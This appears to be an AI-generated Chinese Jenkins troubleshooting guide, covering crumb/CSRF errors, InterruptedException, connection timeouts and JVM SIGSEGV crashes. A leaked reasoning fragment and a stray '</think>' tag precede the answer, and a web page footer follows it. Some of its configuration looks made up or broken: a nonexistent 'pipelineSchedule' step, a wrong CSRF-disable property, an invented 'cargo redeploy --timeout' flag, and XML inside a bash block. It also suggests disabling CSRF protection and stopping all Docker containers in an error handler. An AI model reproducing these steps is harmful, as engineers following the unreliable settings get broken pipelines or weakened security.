**优化资源分配**: - 确保Jenkins Master和Agent有足够的内存和CPU。 - 限制并行任务数量(例如在`Jenkinsfile`中使用`lock`或`semaphore`)。 4. **检查节点连接**:确保Agent节点网络稳定,避免断开。 ### 三、执行超时异常(如`java.net.ConnectException: Connection timed out`) **问题描述**:网络连接超时,常见于部署、下载依赖等环节[^4]。 **解决方案**: 1. **延长超时时间**: ```groovy withEnv(['MAVEN_OPTS=-Dmaven.wagon.http.retryHandler.count=3 -Dmaven.wagon.httpconnectionManager.timeout=5000']) { sh 'mvn deploy' } ``` 2. **重试机制**: ```groovy retry(3) { sh './deploy.sh' } ``` 3. **检查网络环境**: - 确保目标服务器可达(如Tomcat部署地址)。 - 检查防火墙和代理设置。 ### 四、Java SIGSEGV致命错误 **问题描述**:JVM因段错误崩溃,常见于Docker容器环境中的打包任务。 **解决方案**(补充之前内容): 1. **容器内存限制**: 确保容器内存足够(至少4GB),并启用容器感知: ```groovy agent { docker { image 'maven:3.8.5-openjdk-17' args '--memory=4g --cpus=2 -e MAVEN_OPTS="-XX:+UseContainerSupport -XX:MaxRAMPercentage=75.0"' } } ``` 2. **升级JDK**:使用OpenJDK 17 LTS(修复已知内存问题)。 3. **收集崩溃日志**: - 在容器内添加JVM参数:`-XX:+ErrorFileToStderr`,将错误日志输出到控制台。 - 分析`hs_err_pid*.log`文件,定位崩溃原因(如本地库冲突)。 --- ### 通用优化建议 1. **Jenkins系统配置**: - 升级到最新LTS版本(如2.426.1)。 - 定期清理工作空间(使用`ws-cleanup`插件)。 2. **资源监控**:安装`Monitoring`插件,实时查看Master/Agent负载。 --- §§相关问题§§ 1. 如何配置Jenkins以提高高并发任务下的稳定性? 2. Jenkins中如何安全地管理API Token? 3. 如何诊断Jenkins任务中的内存泄漏问题? </think> 针对 Jenkins 运行中的四大核心问题(无效 crumb 警告、InterruptedException 异常、执行超时异常、Java SIGSEGV 错误),以下是系统化的解决方案: --- ### 一、无效 crumb 警告解决方案(CSRF 保护问题) **根本原因**:Jenkins 的 CSRF 保护机制导致 API 请求认证失败[^3] **解决步骤**: 1. **启用 crumb 生成器** 进入 `Manage Jenkins` → `Security` → `Configure Global Security`: ```markdown [x] Enable proxy compatibility [x] Prevent Cross Site Request Forgery exploits [x] Default Crumb Issuer # 关键配置 ``` 2. **API 请求中添加 crumb** ```bash # 获取 crumb 示例 CRUMB=$(curl -u "admin:APIToken" -s 'http://jenkins-host/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)') # 在请求头中使用 crumb curl -H "$CRUMB" -X POST http://jenkins-host/job/build ``` 3. **临时禁用(测试环境)** 修改 `jenkins.xml` 添加 JVM 参数: ```xml <arguments>-Dhudson.security.csrf.GlobalCrumbIssuer.DISABLE=true</arguments> ``` --- ### 二、InterruptedException 异常解决方案 **根本原因**:任务被强制中断(手动停止/资源竞争/节点离线)[^1] **解决流程**: ```mermaid graph LR A[发生InterruptedException] --> B{检查中断来源} B -->|用户手动停止| C[添加确认步骤] B -->|资源不足| D[优化资源分配] B -->|节点离线| E[监控节点状态] C --> F["添加确认对话框:<br>input message: '确认继续?'"] D --> G["限制并行任务:<br>lock(resource: 'db'){...}"] E --> H["节点健康检查:<br>Jenkins → Manage Nodes → Monitor"] ``` **具体操作**: 1. **Pipeline 增加中断处理** ```groovy try { stage('Build') { // 敏感操作前添加确认 input message: '确认执行高危操作?', ok: '继续' sh 'mvn package' } } catch (InterruptedException ex) { // 优雅清理资源 sh 'docker stop $(docker ps -aq)' error "构建被中断:${ex.message}" } ``` 2. **资源隔离** ```groovy lock(resource: 'high_mem_job', inversePrecedence: true) { sh './memory_intensive_task.sh' // 独占资源执行 } ``` --- ### 三、执行超时异常解决方案 **典型错误**:`java.net.ConnectException: Connection timed out`[^4] **多维解决方案**: | 问题类型 | 检测命令 | 修复方案 | |----------------|------------------------------|--------------------------------------------------------------------------| | **网络超时** | `ping target-host` | 在 Jenkins 全局配置增加超时参数:`-DsocketTimeout=600000` | | **部署失败** | `telnet deploy-host 8080` | 添加部署重试机制:`retry(3) { sh 'cargo redeploy' }` | | **依赖下载** | `mvn dependency:resolve -X` | 配置镜像仓库:`<mirror><id>aliyun</id><url>https://maven.aliyun.com</url></mirror>` | **关键配置**: ```groovy // Jenkinsfile 全局超时设置 pipeline { options { timeout(time: 2, unit: 'HOURS') // 项目级超时 } stages { stage('Deploy') { options { timeout(time: 30, unit: 'MINUTES') // 阶段级超时 } steps { retry(3) { // 失败重试 sh 'cargo redeploy --timeout=600000' } } } } } ``` --- ### 四、Java SIGSEGV 错误解决方案 **根本原因**:JVM 内存越界/本地库冲突(常见于容器环境) **根治方案**: #### 1. **容器内存优化** ```groovy agent { docker { image 'maven:3.8.6-eclipse-temurin-17' args ''' --memory=4g --cpus=2.0 -e MAVEN_OPTS="-XX:+UseContainerSupport -XX:MaxRAMPercentage=75.0" ''' } } ``` #### 2. **JVM 参数调优** ```bash # 在 mvn 命令前添加 export MAVEN_OPTS="-XX:+CrashOnOutOfMemoryError -XX:ErrorFile=/tmp/hs_err_%p.log" mvn clean package ``` #### 3. **崩溃日志分析** ```bash # 查看崩溃日志关键字段 grep -A 20 "SIGSEGV" /tmp/hs_err_*.log # 典型输出分析 ---------------- Problematic frame: C [libnative.so+0x1234] # 指向本地库冲突 ``` **处理策略**: 1. 若出现 `[libjvm.so+...]` → 升级 JDK 至 Temurin 17.0.8+ 2. 若出现 `[libc.so.6+...]` → 统一基础镜像(推荐 `eclipse-temurin:17-jdk-alpine`) --- ### 五、系统级加固建议 1. **Jenkins 全局配置** ```bash # 增加 JVM 堆大小(jenkins.xml) <arguments>-Xmx4g -XX:MaxRAMPercentage=75.0</arguments> ``` 2. **定期维护任务** ```groovy // 每日凌晨清理资源 pipelineSchedule('@daily') { buildDiscarder(logRotator(numToKeepStr: '10')) cleanWs() // 清理工作空间 } ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值